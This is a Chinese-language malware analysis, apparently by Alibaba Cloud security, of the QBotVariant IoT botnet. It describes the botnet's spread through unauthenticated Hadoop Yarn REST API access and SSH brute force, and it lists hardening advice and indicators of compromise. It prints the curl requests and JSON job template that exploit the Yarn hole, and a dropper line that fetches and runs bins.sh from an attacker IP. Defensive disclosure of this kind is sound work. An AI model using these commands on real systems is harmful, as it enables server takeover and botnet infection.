由於看見，因此發現：QBotVariant謝絕落幕

互聯網給人帶來便捷的同時，其公開大量的資源也一樣給惡意利用者帶了便捷，愈來愈多公開的惡意程序源碼下降了對外攻擊、入侵的難度，使得安全問題越發嚴重。

阿里雲安全團隊從今年5月份監測到一BOT家族，其樣本改寫自互聯網公開渠道源碼，在互聯網上普遍傳播，形成了極大的危害，雲安全團隊對該類樣本作了分析、聚類、溯源，在此咱們將該類樣本命名爲QBotVariant。

QBotVariant具備DDoS攻擊、後門、下載器、暴力破解等功能，一旦被入侵便變成肉雞，其主要傳播方式經過Hadoop Yarn資源管理系統REST API未受權訪問漏洞和基於弱口令的暴力破解。相似Mirai該BOT家族針對多個版本的操做系統，不只服務器受到危害，如CCTV監控、家庭路由等IOT設備更容易被攻擊、入侵。Radware公司Pascal Geenens在最新的博客《New DemonBot Discovered》中說起到該類樣本，可是他發現的IP、樣本等信息只是該類家族的其中一個樣本，而咱們從監測到30多個下載服務器能夠看出，QBotVariant多變的IP和二進制樣本變種，使其難以發現和跟蹤。

在雲平臺上，咱們監測到的QBotVariant活躍度以下，峯值的時候能夠達到上千個，活躍度一直未減。

如下咱們將從傳播方式、腳本分析、樣本分析、溯源等多個角度對QBotVariant進行詳細的分析。

入侵、傳播方式

QBotVariant家族傳播的方式有兩種，一是利用Hadoop Yarn資源管理系統REST API未受權訪問漏洞進行入侵，二是經過硬編碼的弱密碼進行SSH暴力破解。

Hadoop是一款由Apache基金會推出的分佈式系統框架，它經過著名的MapReduce算法進行分佈式處理，Yarn是Hadoop集羣的資源管理系統。Hadoop Yarn資源管理系統配置不當致使能夠未經受權進行訪問，從而被攻擊者惡意利用。攻擊者無需認證便可經過REST API部署任務來執行任意代碼，最終徹底控制服務器。

其問題來源於對外開啓瞭如下做用的端口

yarn.resourcemanager.webapp.address，默認端口8088

yarn.resourcemanager.webapp.https.address，默認端口8090

經過對新申請application，以下指令

curl -v -X POST 'http://ip:port/ws/v1/cluster/apps/new-application'

再執行以下指令便可完成入侵

curl -s -i -X POST -H 'Accept:application/json' -H 'Content-Type:application/json'http://ip:port/ws/v1/cluster/apps -data-binary @example.json

其example.json文件以下

{

"am-container-spec":{

"commands":{

"command":"執行的命令書寫在這裏"

}

},

"application-id":"application_xxxx_xxxxx",

"application-name":"test",

"application-type":"YARN"

}

腳本分析

咱們經過溯源找到了QBotVariant比較原始版本的腳本，在原始版本的腳本中支持wget、tftp、ftpget等腳本的執行，從遠程下載服務器下載腳本並執行

bash -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;

wget http://185.244.25.153/bins.sh; chmod 777 bins.sh; sh bins.sh;

tftp 185.244.25.153 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh;

tftp -r tftp2.sh -g 185.244.25.153; chmod 777 tftp2.sh; sh tftp2.sh;

ftpget -v -u anonymous -p anonymous -P 21 185.244.25.153 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh

如下是阿里雲安全截獲的一個通過改寫的下載腳本，從腳本能夠看出做者爲了可以很好的對IOT設備支持，一方面編譯了不一樣版本的程序，經過ntpd、sshd、openssh等進行假裝；另外一方面每一個命令行都加入了對busybox的支持，這些使得該類腳本很好的支持了IOT設備，爲QBotVaraint的傳播提供了更加便捷的途徑。

在阿里雲捕獲的源碼中有用於編譯多個版本的腳本

QBotVariant支持版本類型及其對應二進制名稱:

支持版本類型	對應二進制名稱	支持版本類型	對應二進制名稱
mips	ntpd	i586	ftp
mipsel	sshd	m68k	pftp
sh4	openssh	sparc	sh
x86_64	bash	armv4l
armv6l	tftp	armv5l	apache2
i686	wget	powerpc-440fp	telnetd
powerpc	cron

樣本分析

阿里雲截獲的多批次樣本都比較類似，都改編於QBot。某些做者爲了精簡樣本或者進行殺軟對抗可能將某些功能進行裁剪，咱們隨機對比兩個捕獲的樣本，如圖右邊的樣本對getRandomPublicIP函數進行了裁剪，該樣本只實現了QBot的少量功能，其文件更小、功能更加單一。

而絕大部分樣本都實現了基本功能，其傳播性、危害性等性質並未改變，部分函數如圖所示

指令分析

咱們對遠控指令進行了分析，其功能以下圖所示

值得注意是StartTheLelz函數，該函數主要用於對隨機生成的IP地址進行爆破，如圖經過getRandomPublicIP函數獲得隨機的IP，將硬編碼的用戶名和密碼存儲在結構體中，而後進行鏈接，其最大爆破次數經過max變量進行控制，max和文件描述表的項數有關但最大不超過4096。

經過數據區能夠看見做者集成了幾種常見的用戶名和密碼用於爆破

若是最終爆破成功，則會在被爆破的主機中執行以下腳本，從而感染主機，再繼續向外傳播

除了集成常見的對外DDoS攻擊方法，QBotVariant還能夠進行對外發送垃圾數據，經過sendJUNK或sendUDP便可完成該動做，如圖用於生成隨機字符串的makeRandomStr函數，經過發送大量垃圾包一樣能夠形成網絡帶寬阻塞。

而QBotVariant爲了最大化入侵價值，一樣提供了遠程shell命令執行功能，其命令以"SH"開頭，經過fdgets、sockprintf將命令執行後的結果返回到遠控端，實現以下

樣本溯源/同源性分析

咱們在對樣本分析的過程當中發現一個有趣的現象，樣本爲了逃避檢測，有多種不一樣的指令，咱們選取了幾種QBotVariant的上線方式。

 

第一種，信息較簡單，返回大小端、CPU架構、主機用途等信息。

第二種，信息比較全面，帶有操做系統、CPU架構、主機用途、端口、主機IP等信息。

第三種，信息最爲簡單，只返回架構信息。

第四種，返回大小端、架構信息。

第五種，信息比較全面，架構信息、大小端、主機IP、主機用途等信息。

第六種，返回主機IP、類型、版本信息等。

第七種，返回架構、主機IP等信息。

咱們在對樣本進行溯源發現，在pastebin上存在大量該類樣本的源碼、二進制文件等，其存在時間都在數月之久，做者目錄下還包括其餘類型IOT蠕蟲，同時發現多個做者進行了QBot的改寫，如圖是其中一位做者的pastebin和github

QBot在國內彷佛你們認知很少，可是因爲源碼簡單、客戶端小、支持多種架構，從09年活躍至今一直未間斷過，常被應用於遠控、DDoS等客戶端，在其截獲的IP中，絕大部分位於北美和歐洲各地，可是雲平臺檢測到來自國內IP的攻擊源，國內安全人員應該引發重視。

 

安全加固 ●  雲防火牆

 

開啓雲防火牆IPS攔截模式和虛擬補丁功能，雲防火牆已經支持對該類漏洞的防護和防止暴力破解功能，用戶即便不及時修復也依然可以進行防護攔截。
 ●  網絡訪問控制
使用"ECS/VPC安全組"對"受影響服務端口"訪問源IP進行控制，若是自己Hadoop環境僅對內網提供服務，請不要將Hadoop服務端口發佈到互聯網。
 ●  更新升級

若使用自建的Hadoop，根據實際狀況及時更新補丁，Hadoop在2.X以上版本提供了安全認證功能，加入了Kerberos認證機制，建議啓用Kerberos認證功能或者您能夠選擇使用雲上的MaxCompute(8年以上"零"安全漏洞)或雲上的E-MAPREDUCE服務。

安全建議

 ●  雲防火牆產品已支持防護針對此漏洞的攻擊，建議用戶能夠購買雲防火牆，開啓檢測。

 ●  經過安全管家服務，在阿里雲安全專家的指導下進行安全加固及優化工做，避免系統受到漏洞影響。

總結

QBotVariant經過Hadoop Yarn資源管理系統REST API未受權訪問漏洞、弱密碼口令爆破等方式進行入侵，一旦感染此類蠕蟲，不只會佔用主機計算資源消耗帶寬流量，成爲攻擊其餘主機的肉雞，還可能形成數據泄露，數據丟失等後果。

阿里雲安全提醒廣大互聯網用戶，注意第三方應用的配置，防止出現此類未受權漏洞，同時增強用戶名和密碼的安全意識，切實保護自身資產安全。

IOC

部分MD5-文件名

文件名	MD5
185.244.25.153
YSDKOP.arm4	cc9de0d789efc8636946b4b41f374dfc
YSDKOP.arm5	ac94604edfe7730ccf70d5cd75610d01
YSDKOP.arm6	dcb51c5abd234a41ee0439183f53fd2d
YSDKOP.arm7	2416380b2fe0c693fd7c26a91b4cb8ee
YSDKOP.i586	2f029723c778f15e8e825976c66e45cd
YSDKOP.i686	49ec48d3afdddb098fa2c857fc63c848
YSDKOP.m68k	7efef839902ca20431d58685d9075710
YSDKOP.mips	eab0810535b45fa1bf0f6243dafb0373
YSDKOP.mpsl	a2c4e09821be6a4594e88376b9c30b5d
YSDKOP.ppc	1fc61114722f301065cd9673025ce5e0
YSDKOP.sh4	38abc827e67ff53d0814979b435e2c40
YSDKOP.sparc	20a38aeeffba9f0f1635c7b4b78f3727
YSDKOP.x86	8fd97d622e69b69a3331ee5ed08e71b2
188.166.125.19
	7e9c49b9e743bcf7b382fa000c27b49d
apache2	64394fb25494b0cadf6062a0516f7c1a
bash	75e7ce8c110bb132d3897b293d42116a
cron	e8dfae1fe29183548503dc0270878e52
ftp	0e765d00f0ee174e79c81c9db812e3a2
ntpd	2cb932dcb5db84dafa8cdc6b4afa52d0
openssh	606a3169f099b0f2423c63b4ed3f9414
pftp	6666ef216ce7434927338137760f4ab0
sh	cc2e82ffbc6d5053efade4849c13099f
sshd	00b0a6516986aca277d0148c7ddf38c4
tftp	38b075ee960d08e96b2e77205ec017de
wget	58c5e1bc66ac6b364639bce4b3f76c58

部分IP

178.128.194.222	178.128.7.76
103.214.111.122	130.185.250.199
194.182.80.200	138.197.74.100
198.199.84.119	104.248.165.108
178.128.46.254	159.65.227.17
206.189.196.216	80.211.109.66
194.48.152.114	159.89.114.171
178.128.43.104	185.244.25.153
209.97.159.10	46.36.37.121
46.29.164.242	46.17.47.250
158.69.60.239	195.181.223.138
80.211.39.186	188.166.125.19
104.248.112.122	212.237.26.71
178.128.239.252	104.248.212.127
104.248.63.168

部分URL及出現時間

URL	時間
http://138.197.74.100/bins.sh	20180904
http://80.211.39.186/bins.sh	20180904
http://178.128.239.252/bins.sh	20180908
http://158.69.60.239/bins/boti586final	20180908
http://158.69.60.239/bins/botx86_64final	20180908
http://158.69.60.239/bins/boti686final	20180908
http://158.69.60.239/bins.sh	20180908
http://178.128.239.252/bins.sh	20180909
http://130.185.250.199/bins.sh	20180909
http://46.17.47.250/xm2bash	20180913
http://104.248.112.122/Kuso69/Akiru.x86	20180918
http://194.182.80.200/bins.sh	20180919
http://104.248.112.122/Kuso69/Akiru.x86	20180919
http://209.97.159.10/bins.sh	20181003
http://46.17.47.250/xm2wget	20181005
http://185.244.25.153/bins.sh	20181009
http://159.65.227.17/bins.sh	20181009
http://178.128.7.76/bins.sh	20181010
http://185.244.25.153/bins.sh	20181010
http://104.248.212.127/bins.sh	20181010
http://159.65.227.17/bins.sh	20181010
http://206.189.196.216/bins.sh	20181010
http://188.166.125.19/bins.sh	20181010
http://188.166.125.19/bins.sh	20181011
http://185.244.25.153/bins.sh	20181011
http://178.128.7.76/bins.sh	20181011
http://104.248.212.127/bins.sh	20181011
http://80.211.109.66/bins.sh	20181012
http://185.244.25.153/bins.sh	20181012
http://195.181.223.138/bins.sh	20181012
http://159.89.114.171/bins.sh	20181012
http://178.128.7.76/bins.sh	20181012
http://104.248.212.127/bins.sh	20181012
http://185.244.25.153/bins.sh	20181015
http://104.248.165.108/bins.sh	20181018
http://198.199.84.119/bins.sh	20181018
http://103.214.111.122/bins.sh	20181019
http://178.128.46.254/bins.sh	20181019
http://178.128.43.104/bins.sh	20181019
http://104.248.63.168/vvglma	20181021
http://178.128.194.222/bins.sh	20181026
http://178.128.194.222/bins.sh	20181027
http://178.128.194.222/bins.sh	20181028
http://46.29.164.242/bins.sh	20181031
http://194.48.152.114/bins.sh	20181101
http://46.36.37.121/weed.sh	20181103

原文連接 本文爲雲棲社區原創內容，未經容許不得轉載。